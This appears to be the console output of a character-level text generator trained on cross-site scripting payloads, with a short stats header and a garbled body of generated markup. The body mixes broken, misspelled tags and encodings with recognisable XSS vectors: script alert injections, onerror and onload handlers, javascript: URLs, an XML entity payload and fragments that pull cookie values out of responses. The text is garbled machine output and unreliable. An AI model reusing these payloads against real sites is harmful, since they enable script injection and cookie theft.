[*] Total Characters: 36896
[*] Total Vocab: 116
[*] Total Patterns: 36884
[*] Seed: '#32&#115&#11'

5&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#10
(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo
ttp://www.w3.org/1000/svg"><scth d="M0,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <almment aateoetype="sostpe"/>
<?xml-stylesheet type="text/ cols="50" 
okie ; </script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>

" /></image></svg>
<oframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">sc
0068\u0065\u007F\u0067\u0072\u007F\u0067\u0072\u007F\u0067\u0072\u007F\u0067\u0072\u007F\u0067\u0072\u007F\u0067\u0072\u007F\u0067\u0072\u007F\u0067\u0072\u007F\u0067\u0072\u007F\u0067\u0072\u007F\u00
MjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZ2J1Zwsg:/bcramc src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror
vg"><scth d="M0,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <almment aateoetype="sostpe"/>
<?xml-stylesheet type="text/ cols="50" rows="10"></textarea><s
style%3E 3Csmlle%3%35xvg:%<iva smlns:xlink="http://www.w3.org/1000/svg"><scth d="M0,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <almment aateoetype="sost
;>
<for id="x">XXX</div><style>#x{font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>d.innerHTML+match(/'([^']%2b)/)[1])</script>
<script> document.getElementById(%div2").inn
le="-o-link:'javascript:alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><scr
indow.open('htppsiot')(   onlouieover='alert(1)'> <X href="javascript:alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! 
t>http://html:sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">script> document.getElementById(%d
 onclick="alert(1)">
<a href="javascript:alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</scrip
.fr/images/srpr/logo3w.png onload=foe(this-thie.oecit(,'></soyle>
<frameset onload=alert(1)
></dire <dtr sac tooreo=alert(1)"></dire <dtr sac tooreo=alert(1)"></dire <dtr sac tooreo=alert(1)"></dire <
>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>
'click','isTrusted', function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">script> document.getElementById(%div2").innerHTML;</script>
<sc
TYPE x SYSTEM "test.dtd"><x>&x;</x>
<?xml-stylesheet type="text/ cols="50" rows="10"></textarea><script>ta.appendChild(clone); alert(tasult.iterateNext().data.match(/cookie = '(.*?)'/)[1]) };xhr.send(
t%253e%22%3E%3C/iframe%3E
<a target="x" href="xssme?xss=<script>flndtrm(  (  foerm('User cookie is ' %2B x);    else     console.log(doc); var xesult = xpe.evaaueNSReeolvart(){" {alue="anmii"    aonmo
dD4='; </script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>

].fiostChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta onfocus=%22write('<script>'%2Blocation.hash)substr(1)) }</script><iframe src="22javascript:plen
=alert(1)>/script>">script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script
Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2F/svg%3E"/><fmaee xlink:href="data:image/svg+xml,%3Csvg 20xmlns%3D%22http%3A%2F%2Fwwwle%3E%3C%2Fscript%3Ealert(1)%3C/script%3E%
/foo.f)oo};color:red/*/foo.jpg);">X</div>
<div it="x"></icripe>
<iframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</titl
nnerHTML+match(/'([^']%2b)/)[1])</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%di

[*] done
